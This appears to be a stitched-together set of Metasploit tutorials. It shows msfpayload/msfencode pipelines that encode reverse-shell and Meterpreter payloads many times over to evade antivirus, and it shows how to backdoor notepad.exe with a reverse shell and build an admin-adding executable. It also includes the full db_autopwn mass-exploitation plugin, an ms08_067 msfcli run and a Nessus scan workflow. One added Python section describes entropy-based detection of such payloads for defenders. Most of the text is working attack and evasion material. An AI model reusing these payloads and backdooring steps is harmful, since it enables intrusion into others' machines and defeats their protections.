metasploit -> msfencode: single-pass and multi-pass encoding for antivirus evasion.

[bash]

root@bt:/# msfpayload windows/shell_reverse_tcp LHOST=192.168.1.101 LPORT=31337 R | msfencode -e x86/shikata_ga_nai -t exe > /var/www/payload2.exe
[*] x86/shikata_ga_nai succeeded with size 342 (iteration=1)
root@bt:/# file /var/www/payload2.exe
/var/www/2.exe: MS-DOS executable PE for MS Windows (GUI) Intel 80386 32-bit

[/bash]

We add the R flag to the msfpayload command line to specify raw output, because we will pipe its output directly into msfencode. We specify the x86/shikata_ga_nai encoder and tell msfencode to send the executable output (-t exe) to /var/www/payload2.exe. Finally, we run a quick check to ensure that the resulting file is in fact a Windows executable. The response tells us that it is. Unfortunately, after the payload2.exe file is copied over to the Windows system, AVG detects our encoded payload yet again, as shown in the accompanying figure.

R: tells msfpayload to emit the payload as raw data, because it is about to be encoded.
Choosing the payload and setting its options needs no explanation. | is the pipe. -e is followed by the msfencode encoder to use, and -t exe is msfencode's output type.

> is followed by the path of the output file.

That is single-pass encoding. Multi-pass encoding looks like this:

[bash]

root@bt:/opt/framework3/msf3# msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.101 LPORT=31337 R | msfencode -e x86/shikata_ga_nai -c 5 -t raw | msfencode -e x86/alpha_upper -c 2 -t raw | msfencode -e x86/shikata_ga_nai -c 5 -t raw | msfencode -e x86/countdown -c 5 -t exe -o /var/www/payload3.exe
[*] x86/shikata_ga_nai succeeded with size 318 (iteration=1)
[*] x86/shikata_ga_nai succeeded with size 345 (iteration=2)
[*] x86/shikata_ga_nai succeeded with size 372 (iteration=3)
[*] x86/shikata_ga_nai succeeded with size 399 (iteration=4)
[*] x86/shikata_ga_nai succeeded with size 426 (iteration=5)
[*] x86/alpha_upper succeeded with size 921 (iteration=1)
[*] x86/alpha_upper succeeded with size 1911 (iteration=2)
[*] x86/shikata_ga_nai succeeded with size 1940 (iteration=1)
[*] x86/shikata_ga_nai succeeded with size 1969 (iteration=2)
[*] x86/shikata_ga_nai succeeded with size 1998 (iteration=3)
[*] x86/shikata_ga_nai succeeded with size 2027 (iteration=4)
[*] x86/shikata_ga_nai succeeded with size 2056 (iteration=5)
[*] x86/countdown succeeded with size 2074 (iteration=1)
[*] x86/countdown succeeded with size 2092 (iteration=2)
[*] x86/countdown succeeded with size 2110 (iteration=3)
[*] x86/countdown succeeded with size 2128 (iteration=4)
[*] x86/countdown succeeded with size 2146 (iteration=5)
root@bt:/opt/framework3/msf3#

[/bash]

Here we use five counts of shikata_ga_nai, feeding the code in raw format into two counts of alpha_upper encoding, which is then fed to another five counts of shikata_ga_nai, followed by five counts of countdown encoding, before finally directing the output into the desired executable. We are using a total of 17 encoding loops in an attempt to circumvent the antivirus software. And, as you can see in Figure 7-3, we have successfully slipped our payload past the antivirus engine.

Obviously. Multi-pass encoding just means encoding multiple times... <-- stating the obvious

But make sure that, apart from the final stage that produces the file type you actually need, every intermediate stage in the pipeline receives RAW data as its input.

msfpayload emits raw data with the R argument; msfencode emits raw data with -t raw.

In the example above, each encoder was run for several rounds; the -c argument controls the count.
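A defender's counterpart to the pipeline above: each encoder pass leaves a small decoder stub followed by scrambled data, so the bytes carrying the payload look close to random, and 17 stacked passes only make that more pronounced. This added example (it is not code from the original post or from Metasploit) lists every section of a Windows executable together with its Shannon entropy, which is the quick triage check an analyst runs on a binary like payload3.exe before deeper analysis. The PE header offsets are the documented PE/COFF layout; the 7.0 bits/byte threshold, `build_sample_pe()` and the two sample sections in `demo_report()` are constructed for illustration.

```python
"""Per-section entropy of a Windows PE, as a triage signal for encoded payloads.

Added example, not from the original post or from Metasploit. The header
offsets follow the PE/COFF specification; the sample image is constructed.
"""
import math
import random
import struct
from collections import Counter

HIGH_ENTROPY = 7.0  # bits per byte; a triage heuristic, not a fixed standard


def shannon_entropy(data: bytes) -> float:
    """Shannon entropy of a byte string in bits per byte (0.0 for empty input)."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def pe_sections(image: bytes):
    """Yield (name, raw_offset, raw_size) for each section header in a PE image."""
    if image[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    (e_lfanew,) = struct.unpack_from("<I", image, 0x3C)       # offset of "PE\0\0"
    if image[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4                                        # COFF file header
    (num_sections,) = struct.unpack_from("<H", image, coff + 2)
    (opt_size,) = struct.unpack_from("<H", image, coff + 16)  # SizeOfOptionalHeader
    table = coff + 20 + opt_size                               # section table start
    for i in range(num_sections):
        off = table + i * 40                                   # 40-byte section headers
        if off + 40 > len(image):
            raise ValueError("section table truncated")
        name = image[off:off + 8].rstrip(b"\0").decode("ascii", "replace")
        raw_size, raw_ptr = struct.unpack_from("<II", image, off + 16)
        yield name, raw_ptr, raw_size


def section_entropy_report(image: bytes):
    """Return [(name, size, entropy, flagged)] for every section of the image."""
    report = []
    for name, ptr, size in pe_sections(image):
        data = image[ptr:ptr + size]
        ent = shannon_entropy(data)
        report.append((name, len(data), round(ent, 3), ent >= HIGH_ENTROPY))
    return report


def build_sample_pe(sections):
    """Construct a minimal PE image (headers plus raw sections) for testing.

    Constructed test data only: no optional header, so it cannot run.
    `sections` is a list of (name, raw_bytes).
    """
    e_lfanew = 0x40
    dos = bytearray(b"MZ" + b"\0" * (e_lfanew - 2))
    struct.pack_into("<I", dos, 0x3C, e_lfanew)
    coff = struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, 0, 0)
    data_start = e_lfanew + 4 + len(coff) + 40 * len(sections)
    table, body = bytearray(), bytearray()
    for name, raw in sections:
        ptr = data_start + len(body)
        table += struct.pack("<8sIIIIIIHHI", name.encode("ascii"), len(raw), 0x1000,
                             len(raw), ptr, 0, 0, 0, 0, 0)
        body += raw
    return bytes(dos) + b"PE\0\0" + coff + bytes(table) + bytes(body)


def demo_report():
    """Compare a repetitive code-like section with a scrambled one (constructed)."""
    rng = random.Random(1)                                     # deterministic stand-in
    plain = b"\x55\x8b\xec\x83\xec\x10\x90" * 64               # repetitive, low entropy
    scrambled = bytes(rng.getrandbits(8) for _ in range(2048))  # near-random bytes
    image = build_sample_pe([(".text", plain), (".enc", scrambled)])
    return section_entropy_report(image)


if __name__ == "__main__":
    for name, size, ent, flagged in demo_report():
        print(f"{name:<8} {size:>6} bytes  entropy={ent:.3f}  {'SUSPECT' if flagged else 'ok'}")
```

On a real sample, read the file with `open(path, "rb").read()` and pass it to `section_entropy_report()`; a legitimate code section usually sits well below the threshold, and comparing the section list of a suspect binary with a known-good copy of the same program also shows up sections that were added by a template injection.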

Finally, here is msfencode's help output, which documents the parameters in detail.

[bash]

root@bt:~# msfencode -h

Usage: /opt/metasploit/msf3/msfencode <options>

OPTIONS:

-a <opt>  The architecture to encode as
-b <opt>  The list of characters to avoid: '\x00\xff'
-c <opt>  The number of times to encode the data
-d <opt>  Specify the directory in which to look for EXE templates
-e <opt>  The encoder to use
-h        Help banner
-i <opt>  Encode the contents of the supplied file path
-k        Keep template working; run payload in new thread (use with -x)
-l        List available encoders
-m <opt>  Specifies an additional module search path
-n        Dump encoder information
-o <opt>  The output file
-p <opt>  The platform to encode for
-s <opt>  The maximum size of the encoded data
-t <opt>  The output format: raw,ruby,rb,perl,pl,bash,sh,c,js_be,js_le,java,dll,exe,exe-small,elf,macho,vba,vba-exe,vbs,loop-vbs,asp,aspx,war,psh,psh-net
-v        Increase verbosity
-x <opt>  Specify an alternate executable template

root@bt:~#

[/bash]

Backdooring an EXE file with the Metasploit Framework

Official site: www.metasploit.com

Most of this comes from http://www.linux520.com/ ; thanks to teacher beach for sharing it so generously.

http://www.linux520.com/v/l00047/l00047.html
http://www.irongeek.com/videos/msfpayload-msfencoder-metasploit-3-3.swf   Both of these videos are quite useful.
===================
msfpayload   msfencode      msfcli

===================
[bash]
msfpayload -h

 Usage: /msf3/msfpayload <payload> [var=val] <[S]ummary|C|[P]erl|Rub[y]|[R]aw|[J]avascript|e[X]ecutable|[V]BA|[W]ar>

msfpayload windows/shell/reverse_tcp LHOST=192.168.1.13 LPORT=4455 R | msfencode -k -x notepad.exe -t exe -e x86/shikata_ga_nai -c 5 -o diy_notepad.exe

msfcli exploit/multi/handler payload=windows/shell/reverse_tcp lhost=192.168.1.13 lport=4455 E
[/bash]

=====================

[bash]
msfpayload windows/adduser pass=123123 user=admin x > diy_user_add.exe    # generates an executable

chmod +x diy_user_add.exe      # grants execute permission (the generated file has none by default)
[/bash]

===============
[bash]
$ msfcli -h
Usage: /msf3/msfcli <exploit_name> <option=value> [mode]

/msf3/msfcli <exploit_name> <payload_name> t(target) o(option)
========================================================

Mode          Description
----          -----------
(H)elp         You're looking at it baby!
(S)ummary      Show information about this module
(O)ptions      Show available options for this module
(A)dvanced     Show available advanced options for this module
(I)DS Evasion  Show available ids evasion options for this module
(P)ayloads     Show available payloads for this module
(T)argets      Show available targets for this exploit module
(AC)tions      Show available actions for this auxiliary module
(C)heck        Run the check routine of the selected module
(E)xecute      Execute the selected module

msfcli windows/smb/ms08_067_netapi payload=windows/shell/bind_tcp target=1 RHOST=192.168.1.13 LPORT=5555
[/bash]

db_autopwn.rb

Archive download:
db_autopwn
Alternatively, copy the text below, save it as db_autopwn.rb, and put it in msf's plugins directory.
To use it:
load db_autopwn
and then run the command.


[ruby]
#
# db_autopwn - stripped from previous db commands and modified into a plugin as autopwn has been
#        pulled from the mainline release.
#
#        Issues/Bugs should go to neinwechter via GitHub
#

module Msf

class Plugin::DBAutopwn < Msf::Plugin
  class DBAutopwnCommandDispatcher
    include Msf::Ui::Console::CommandDispatcher

    #
    # Constants
    #

    PWN_SHOW = 2**0
    PWN_XREF = 2**1
    PWN_PORT = 2**2
    PWN_EXPL = 2**3
    PWN_SING = 2**4
    PWN_SLNT = 2**5
    PWN_VERB = 2**6

    def name
      "db_autopwn"
    end

    def commands
      {
        "db_autopwn" => "Automatically exploit everything",
      }
    end

    #
    # Returns true if the db is connected, prints an error and returns
    # false if not.
    #
    # All commands that require an active database should call this before
    # doing anything.
    #
    def active?
      if not framework.db.active
        print_error("Database not connected")
        return false
      end
      true
    end

    #
    # A shotgun approach to network-wide exploitation
    # Officially deprecated as of 4.1
    #
    # Forked for those who still want it and understand its limitations/issues
    #

    def cmd_db_autopwn(*args)
      return unless active?

      print_error("")
      print_error("Warning: The db_autopwn command is not officially supported and exists only in a branch.")
      print_error("         This code is not well maintained, crashes systems, and crashes itself.")
      print_error("         Use only if you understand it's current limitations/issues.")
      print_error("         Minimal support and development via neinwechter on GitHub metasploit fork.")
      print_error("")

      stamp = Time.now.to_f
      vcnt  = 0
      rcnt  = 0
      mode  = 0
      code  = :bind
      mjob  = 5
      regx  = nil
      minrank = nil
      maxtime = 120

      port_inc = []
      port_exc = []

      targ_inc = []
      targ_exc = []

      args.push("-h") if args.length == 0

      while (arg = args.shift)
        case arg
        when '-t'
          mode |= PWN_SHOW
        when '-x'
          mode |= PWN_XREF
        when '-p'
          mode |= PWN_PORT
        when '-e'
          mode |= PWN_EXPL
        when '-s'
          mode |= PWN_SING
        when '-q'
          mode |= PWN_SLNT
        when '-v'
          mode |= PWN_VERB
        when '-j'
          mjob = args.shift.to_i
        when '-r'
          code = :conn
        when '-b'
          code = :bind
        when '-I'
          tmpopt = OptAddressRange.new('TEMPRANGE', [ true, '' ])
          range = args.shift
          if not tmpopt.valid?(range)
            print_error("Invalid range for -I")
            return
          end
          targ_inc << Rex::Socket::RangeWalker.new(tmpopt.normalize(range))
        when '-X'
          tmpopt = OptAddressRange.new('TEMPRANGE', [ true, '' ])
          range = args.shift
          if not tmpopt.valid?(range)
            print_error("Invalid range for -X")
            return
          end
          targ_exc << Rex::Socket::RangeWalker.new(tmpopt.normalize(range))
        when '-PI'
          port_inc = Rex::Socket.portspec_to_portlist(args.shift)
        when '-PX'
          port_exc = Rex::Socket.portspec_to_portlist(args.shift)
        when '-m'
          regx = args.shift
        when '-R'
          minrank = args.shift
        when '-T'
          maxtime = args.shift.to_f
        when '-h','--help'
          print_status("Usage: db_autopwn [options]")
          print_line("\t-h          Display this help text")
          print_line("\t-t          Show all matching exploit modules")
          print_line("\t-x          Select modules based on vulnerability references")
          print_line("\t-p          Select modules based on open ports")
          print_line("\t-e          Launch exploits against all matched targets")
          # print_line("\t-s          Only obtain a single shell per target system (NON-FUNCTIONAL)")
          print_line("\t-r          Use a reverse connect shell")
          print_line("\t-b          Use a bind shell on a random port (default)")
          print_line("\t-q          Disable exploit module output")
          print_line("\t-R  [rank]  Only run modules with a minimal rank")
          print_line("\t-I  [range] Only exploit hosts inside this range")
          print_line("\t-X  [range] Always exclude hosts inside this range")
          print_line("\t-PI [range] Only exploit hosts with these ports open")
          print_line("\t-PX [range] Always exclude hosts with these ports open")
          print_line("\t-m  [regex] Only run modules whose name matches the regex")
          print_line("\t-T  [secs]  Maximum runtime for any exploit in seconds")
          print_line("")
          return
        end
      end

      minrank = minrank || framework.datastore['MinimumRank'] || 'manual'
      if ! RankingName.values.include?(minrank)
        print_error("MinimumRank invalid!  Possible values are (#{RankingName.sort.map{|r|r[1]}.join("|")})")
        wlog("MinimumRank invalid, ignoring", 'core', LEV_0)
        return
      else
        minrank = RankingName.invert[minrank]
      end

      # Default to quiet mode
      if (mode & PWN_VERB == 0)
        mode |= PWN_SLNT
      end

      matches    = {}
      refmatches = {}

      # Pre-allocate a list of references and ports for all exploits
      mrefs  = {}
      mports = {}
      mservs = {}

      # A list of jobs we spawned and need to wait for
      autopwn_jobs = []

      [ [framework.exploits, 'exploit' ], [ framework.auxiliary, 'auxiliary' ] ].each do |mtype|
        mtype[0].each_module do |modname, mod|
          o = mod.new

          if(mode & PWN_XREF != 0)
            o.references.each do |r|
              next if r.ctx_id == 'URL'
              ref = r.ctx_id + "-" + r.ctx_val
              ref.upcase!

              mrefs[ref] ||= {}
              mrefs[ref][o.fullname] = o
            end
          end

          if(mode & PWN_PORT != 0)
            if(o.datastore['RPORT'])
              rport = o.datastore['RPORT']
              mports[rport.to_i] ||= {}
              mports[rport.to_i][o.fullname] = o
            end

            if(o.respond_to?('autofilter_ports'))
              o.autofilter_ports.each do |rport|
                mports[rport.to_i] ||= {}
                mports[rport.to_i][o.fullname] = o
              end
            end

            if(o.respond_to?('autofilter_services'))
              o.autofilter_services.each do |serv|
                mservs[serv] ||= {}
                mservs[serv][o.fullname] = o
              end
            end
          end
        end
      end


      begin

        framework.db.hosts.each do |host|
          xhost = host.address
          next if (targ_inc.length > 0 and not range_include?(targ_inc, xhost))
          next if (targ_exc.length > 0 and range_include?(targ_exc, xhost))

          if(mode & PWN_VERB != 0)
            print_status("Scanning #{xhost} for matching exploit modules...")
          end

          #
          # Match based on vulnerability references
          #
          if (mode & PWN_XREF != 0)

            host.vulns.each do |vuln|

              # Faster to handle these here
              serv = vuln.service
              xport = xprot = nil

              if(serv)
                xport = serv.port
                xprot = serv.proto
              end

              vuln.refs.each do |ref|
                mods = mrefs[ref.name.upcase] || {}
                mods.each_key do |modname|
                  mod = mods[modname]
                  next if minrank and minrank > mod.rank
                  next if (regx and mod.fullname !~ /#{regx}/)

                  if(xport)
                    next if (port_inc.length > 0 and not port_inc.include?(serv.port.to_i))
                    next if (port_exc.length > 0 and port_exc.include?(serv.port.to_i))
                  else
                    if(mod.datastore['RPORT'])
                      next if (port_inc.length > 0 and not port_inc.include?(mod.datastore['RPORT'].to_i))
                      next if (port_exc.length > 0 and port_exc.include?(mod.datastore['RPORT'].to_i))
                    end
                  end

                  next if (regx and mod.fullname !~ /#{regx}/)

                  mod.datastore['RPORT'] = xport if xport
                  mod.datastore['RHOST'] = xhost

                  filtered = false
                  begin
                    ::Timeout.timeout(2, ::RuntimeError) do
                      filtered = true if not mod.autofilter()
                    end
                  rescue ::Interrupt
                    raise $!
                  rescue ::Timeout::Error
                    filtered = true
                  rescue ::Exception
                    filtered = true
                  end
                  next if filtered

                  matches[[xport,xprot,xhost,mod.fullname]]=true
                  refmatches[[xport,xprot,xhost,mod.fullname]] ||= []
                  refmatches[[xport,xprot,xhost,mod.fullname]] << ref.name
                end
              end
            end
          end

          #
          # Match based on open ports
          #
          if (mode & PWN_PORT != 0)
            host.services.each do |serv|
              next if not serv.host
              next if (serv.state != ServiceState::Open)

              xport = serv.port.to_i
              xprot = serv.proto
              xname = serv.name

              next if xport == 0

              next if (port_inc.length > 0 and not port_inc.include?(xport))
              next if (port_exc.length > 0 and port_exc.include?(xport))

              mods = mports[xport.to_i] || {}

              mods.each_key do |modname|
                mod = mods[modname]
                next if minrank and minrank > mod.rank
                next if (regx and mod.fullname !~ /#{regx}/)
                mod.datastore['RPORT'] = xport
                mod.datastore['RHOST'] = xhost

                filtered = false
                begin
                  ::Timeout.timeout(2, ::RuntimeError) do
                    filtered = true if not mod.autofilter()
                  end
                rescue ::Interrupt
                  raise $!
                rescue ::Exception
                  filtered = true
                end

                next if filtered
                matches[[xport,xprot,xhost,mod.fullname]]=true
              end

              mods = mservs[xname] || {}
              mods.each_key do |modname|
                mod = mods[modname]
                next if minrank and minrank > mod.rank
                next if (regx and mod.fullname !~ /#{regx}/)
                mod.datastore['RPORT'] = xport
                mod.datastore['RHOST'] = xhost

                filtered = false
                begin
                  ::Timeout.timeout(2, ::RuntimeError) do
                    filtered = true if not mod.autofilter()
                  end
                rescue ::Interrupt
                  raise $!
                rescue ::Exception
                  filtered = true
                end

                next if filtered
                matches[[xport,xprot,xhost,mod.fullname]]=true
              end
            end
          end
        end

      rescue ::Exception => e
        print_status("ERROR: #{e.class} #{e} #{e.backtrace}")
        return
      end

      if (mode & PWN_SHOW != 0)
        print_status("Analysis completed in #{(Time.now.to_f - stamp).to_i} seconds (#{vcnt} vulns / #{rcnt} refs)")
        print_status("")
        print_status("=" * 80)
        print_status(" " * 28 + "Matching Exploit Modules")
        print_status("=" * 80)

        matches.each_key do |xref|
          mod = nil
          if ((mod = framework.modules.create(xref[3])) == nil)
            print_status("Failed to initialize #{xref[3]}")
            next
          end

          if (mode & PWN_SHOW != 0)
            tport = xref[0] || mod.datastore['RPORT']
            if(refmatches[xref])
              print_status("  #{xref[2]}:#{tport}  #{xref[3]}  (#{refmatches[xref].join(", ")})")
            else
              print_status("  #{xref[2]}:#{tport}  #{xref[3]}  (port match)")
            end
          end

        end
        print_status("=" * 80)
        print_status("")
        print_status("")
      end

      ilog("db_autopwn: Matched #{matches.length} modules")

      idx = 0
      matches.each_key do |xref|

        idx += 1

        begin
          mod = nil

          if ((mod = framework.modules.create(xref[3])) == nil)
            print_status("Failed to initialize #{xref[3]}")
            next
          end

          #
          # The code is just a proof-of-concept and will be expanded in the future
          #
          if (mode & PWN_EXPL != 0)

            mod.datastore['RHOST'] = xref[2]

            if(xref[0])
              mod.datastore['RPORT'] = xref[0].to_s
            end

            if (code == :bind)
              mod.datastore['LPORT']   = (rand(0x8fff) + 4000).to_s
              if(mod.fullname =~ /\/windows\//)
                mod.datastore['PAYLOAD'] = 'windows/meterpreter/bind_tcp'
              else
                mod.datastore['PAYLOAD'] = 'generic/shell_bind_tcp'
              end
            end

            if (code == :conn)
              mod.datastore['LHOST']   = Rex::Socket.source_address(xref[2])
              mod.datastore['LPORT']   = (rand(0x8fff) + 4000).to_s

              if (mod.datastore['LHOST'] == '127.0.0.1')
                print_status("Failed to determine listener address for target #{xref[2]}...")
                next
              end

              if(mod.fullname =~ /\/windows\//)
                mod.datastore['PAYLOAD'] = 'windows/meterpreter/reverse_tcp'
              else
                mod.datastore['PAYLOAD'] = 'generic/shell_reverse_tcp'
              end
            end


            if(framework.jobs.keys.length >= mjob)
              print_status("Job limit reached, waiting on modules to finish...")
              while(framework.jobs.keys.length >= mjob)
                ::IO.select(nil, nil, nil, 0.25)
              end
            end

            print_status("(#{idx}/#{matches.length} [#{framework.sessions.length} sessions]): Launching #{xref[3]} against #{xref[2]}:#{mod.datastore['RPORT']}...")

            autopwn_jobs << framework.threads.spawn("AutoPwnJob#{xref[3]}", false, mod) do |xmod|
              begin
                stime = Time.now.to_f
                ::Timeout.timeout(maxtime) do
                  inp = (mode & PWN_SLNT != 0) ? nil : driver.input
                  out = (mode & PWN_SLNT != 0) ? nil : driver.output

                  case xmod.type
                  when MODULE_EXPLOIT
                    xmod.exploit_simple(
                      'Payload'        => xmod.datastore['PAYLOAD'],
                      'LocalInput'     => inp,
                      'LocalOutput'    => out,
                      'RunAsJob'       => false)
                  when MODULE_AUX
                    xmod.run_simple(
                      'LocalInput'     => inp,
                      'LocalOutput'    => out,
                      'RunAsJob'       => false)
                  end
                end

              rescue ::Timeout::Error
                print_status(" >> autopwn module timeout from #{xmod.fullname} after #{Time.now.to_f - stime} seconds")
              rescue ::Exception
                print_status(" >> autopwn exception during launch from #{xmod.fullname}: #{$!} ")
              end
            end
          end

        rescue ::Interrupt
          raise $!

        rescue ::Exception
          print_status(" >> autopwn exception from #{xref[3]}: #{$!} #{$!.backtrace}")
        end
      end

      # Wait on all the jobs we just spawned
      while (not autopwn_jobs.empty?)
        # All running jobs are stored in framework.jobs.  If it's
        # not in this list, it must have completed.
        autopwn_jobs.delete_if { |j| not j.alive? }

        print_status("(#{matches.length}/#{matches.length} [#{framework.sessions.length} sessions]): Waiting on #{autopwn_jobs.length} launched modules to finish execution...")
        ::IO.select(nil, nil, nil, 5.0)
      end

      if (mode & PWN_SHOW != 0 and mode & PWN_EXPL != 0)
        print_status("The autopwn command has completed with #{framework.sessions.length} sessions")
        if(framework.sessions.length > 0)
          print_status("Enter sessions -i [ID] to interact with a given session ID")
          print_status("")
          print_status("=" * 80)
          driver.run_single("sessions -l -v")
          print_status("=" * 80)
        end
      end
      print_line("")
      # EOM
    end

  end

  def initialize(framework, opts)
    super
    add_console_dispatcher(DBAutopwnCommandDispatcher)
  end

  def cleanup
    remove_console_dispatcher('db_autopwn')
  end

  def name
    "db_autopwn"
  end

  def desc
    "Automatically exploit everything"
  end

end
end
[/ruby]

metasploit db_autopwn & load nessus

Author: bugcx or Anonymous
Url: http://blog.bug.cx/2012/04/16/metasploit-db_autopwn-load-nessus/ | bugcx's blog | focused on network security

(Let's have a go.)

[bash]
root@bt:~# msfconsole
  +-------------------------------------------------------+
  |  METASPLOIT by Rapid7                                 |
  +---------------------------+---------------------------+
  |      __________________   |                           |
  |  ==c(______(o(______(_()  | |""""""""""""|======[***  |
  |             )=\           | |  EXPLOIT   \            |
  |            // \\          | |_____________\_______    |
  |           //   \\         | |==[msf >]============\   |
  |          //     \\        | |______________________\  |
  |         // RECON \\       | \(@)(@)(@)(@)(@)(@)(@)/   |
  |        //         \\      |  *********************    |
  +---------------------------+---------------------------+
  |      o O o                |        \'\/\/\/'/         |
  |              o O          |         )======(          |
  |                 o         |       .'  LOOT  '.        |
  | |^^^^^^^^^^^^^^|l___      |      /    _||__   \       |
  | |    PAYLOAD     |""\___, |     /    (_||_     \      |
  | |________________|__|)__| |    |     __||_)     |     |
  | |(@)(@)"""**|(@)(@)**|(@) |    "       ||       "     |
  |  = = = = = = = = = = = =  |     '--------------'      |
  +---------------------------+---------------------------+
       =[ metasploit v4.3.0-dev [core:4.3 api:1.0]
+ -- --=[ 831 exploits - 470 auxiliary - 143 post
+ -- --=[ 250 payloads - 27 encoders - 8 nops
       =[ svn r15107 updated yesterday (2012.04.14)
msf > load nessus
[*] Nessus Bridge for Metasploit 1.1
[+] Type nessus_help for a command listing
[*] Successfully loaded plugin: nessus
msf > nessus_help
[*]
Command                    Help Text
-------                    ---------
Generic Commands
Plugin Commands
Policy Commands
Reports Commands
Scan Commands
User Commands
nessus_admin               Checks if user is an admin
nessus_connect             Connect to a nessus server
nessus_find_targets        Try to find vulnerable targets from a report
nessus_help                Listing of available nessus commands
nessus_logout              Logout from the nessus server
nessus_plugin_details      List details of a particular plugin
nessus_plugin_family       List plugins in a family
nessus_plugin_list         Displays each plugin family and the number of plugins
nessus_policy_del          Delete a policy
nessus_policy_list         List all polciies
nessus_report_get          Import a report from the nessus server in Nessus v2 format
nessus_report_host_detail  Detail from a report item on a host
nessus_report_host_ports   Get list of open ports from a host from a report
nessus_report_hosts        Get list of hosts from a report
nessus_report_list         List all Nessus reports
nessus_save                Save nessus login info between sessions
nessus_scan_new            Create new Nessus Scan
nessus_scan_pause          Pause a Nessus Scan
nessus_scan_pause_all      Pause all Nessus Scans
nessus_scan_resume         Resume a Nessus Scan
nessus_scan_resume_all     Resume all Nessus Scans
nessus_scan_status         List all currently running Nessus scans
nessus_scan_stop           Stop a Nessus Scan
nessus_scan_stop_all       Stop all Nessus Scans
nessus_server_feed         Nessus Feed Type
nessus_server_prefs        Display Server Prefs
nessus_server_status       Check the status of your Nessus Server
nessus_user_add            Add a new Nessus User
nessus_user_del            Delete a Nessus User
nessus_user_list           Show Nessus Users
nessus_user_passwd         Change Nessus Users Password
[*]
[/bash]

Connect to nessus

[bash]
msf > nessus_connect fuckyou:123456@192.168.8.9 ok
[*] Connecting to https://192.168.8.9:8834/ as fuckyou
[*] Authenticated
msf >
[/bash]

nessus user: add a nessus user

[bash]
msf > nessus_user_add
[*] Usage:
[*] nessus_user_add <username> <password>
[*] Only adds non admin users
msf > nessus_user_add xxxooo 123456
[+] xxxooo has been added
[/bash]

View the user list

[bash]
msf > nessus_user_list
[+] There are 3 users
[+] Nessus users
[+]
Name     Is Admin?  Last Login
----     ---------  ----------
fuckyou  TRUE       14:26 Apr 16 2012
xxxooo   FALSE      08:00 Jan 01 1970
xxxxxx   TRUE       08:00 Jan 01 1970
[/bash]

We see that xxxooo is not an admin, so we promote it to admin

[bash]
root@bt:/opt/nessus/sbin# ./nessus-admin
Login : xxxooo
xxxooo is NOT an administrative user. Do you want to grant him admin rights? [y/n] y
xxxooo is now an administrator
root@bt:/opt/nessus/sbin#
[/bash]

Now look at the users again

[bash]
msf > nessus_user_list
[+] There are 3 users
[+] Nessus users
[+]
Name     Is Admin?  Last Login
----     ---------  ----------
fuckyou  TRUE       14:26 Apr 16 2012
xxxooo   TRUE       08:00 Jan 01 1970
xxxxxx   TRUE       08:00 Jan 01 1970
msf >
[/bash]

Choose a scan policy

[bash]
msf > nessus_policy_list
[+] Nessus Policy List
[+]
ID  Name                                         Comments
--  ----                                         --------
-1  Prepare for PCI-DSS audits (section 11.2.2)
-2  Web App Tests
-3  External Network Scan
-4  Internal Network Scan
msf > nessus_scan_new
[*] Usage:
[*]        nessus_scan_new <policy id> <scan name> <targets>
[*]        use nessus_policy_list to list all available policies
msf > nessus_scan_new -2 fuck 192.168.8.5
[*] Creating scan from policy number -2, called "fuck" and scanning 192.168.8.5
[*] Scan started.  uid is a7d66781-fce6-e675-a9d8-d14fa44186c60ed9f72686359bfd
[/bash]

Check the scan status

[bash]
msf > nessus_scan_status
[+] Running Scans
[+]
Scan ID                                               Name  Owner    Started            Status   Current Hosts  Total Hosts
-------                                               ----  -----    -------            ------   -------------  -----------
a7d66781-fce6-e675-a9d8-d14fa44186c60ed9f72686359bfd  fuck  fuckyou  05:40 Apr 16 2012  running  0              1
[+]
[*] You can:
[+]         Import Nessus report to database :  nessus_report_get <reportid>
[+]         Pause a nessus scan :           nessus_scan_pause <scanid>
msf >
[/bash]

List the scan reports

[bash]
msf > nessus_report_list
[+] Nessus Report List
[+]
ID                                                    Name  Status     Date
--                                                    ----  ------     ----
63801a95-dae6-677a-c0ae-24e23db0ef4bd95ca44becc57f34  xxxx  completed  05:37 Apr 16 2012
a7d66781-fce6-e675-a9d8-d14fa44186c60ed9f72686359bfd  fuck  running    06:04 Apr 16 2012
[*] You can:
[*]         Get a list of hosts from the report:          nessus_report_hosts <report id>
msf >
[/bash]

Once the scan finishes, its status changes to completed

[bash]
msf > nessus_report_list
[+] Nessus Report List
[+]
ID                                                    Name  Status     Date
--                                                    ----  ------     ----
30d36481-b570-f399-dc5d-9b057274dc22aae62b3d816166db  fuck  completed  06:04 Apr 16 2012
63801a95-dae6-677a-c0ae-24e23db0ef4bd95ca44becc57f34  xxxx  completed  05:37 Apr 16 2012
[*] You can:
[*]         Get a list of hosts from the report:          nessus_report_hosts <report id>
msf >
[/bash]

Query the details of a given scan report

[bash]
msf > nessus_report_hosts 30d36481-b570-f399-dc5d-9b057274dc22aae62b3d816166db
[+] Report Info
[+]
Hostname     Severity  Sev 0  Sev 1  Sev 2  Sev 3  Current Progress  Total Progress
--------     --------  -----  -----  -----  -----  ----------------  --------------
192.168.8.1  19        8      19     0      0      48026             48026
192.168.8.2  25        8      24     1      0      48026             48026
192.168.8.3  29        8      28     1      0      48026             48026
192.168.8.4  25        6      24     1      0      48026             48026
192.168.8.5  66        13     56     4      6      48026             48026
192.168.8.6  20        6      19     1      0      48026             48026
192.168.8.7  387       13     84     49     254    48026             48026
192.168.8.8  64        5      47     8      9      48026             48026
[*] You can:
[*]         Get information from a particular host:          nessus_report_host_ports <hostname> <report id>
msf >
[/bash]

List the scan results for a given IP

[bash]
msf > nessus_report_host_ports 192.168.8.7 30d36481-b570-f399-dc5d-9b057274dc22aae62b3d816166db
[+] Host Info
[+]
Port  Protocol  Severity  Service Name   Sev 0  Sev 1  Sev 2  Sev 3
----  --------  --------  ------------   -----  -----  -----  -----
0     icmp      1         general        0      2      0      0
0     tcp       1         general        0      21     0      0
0     udp       1         general        0      1      0      0
123   udp       1         ntp?           1      1      0      0
135   tcp       1         epmap          1      2      0      0
137   udp       1         netbios-ns     1      2      0      0
138   udp       1         netbios-dgm?   1      1      0      0
139   tcp       1         smb            1      2      0      0
445   udp       1         microsoft-ds?  1      1      0      0
445   tcp       3         cifs           1      26     42     253
500   udp       1         isakmp?        1      1      0      0
1025  tcp       1         dce-rpc        1      2      0      0
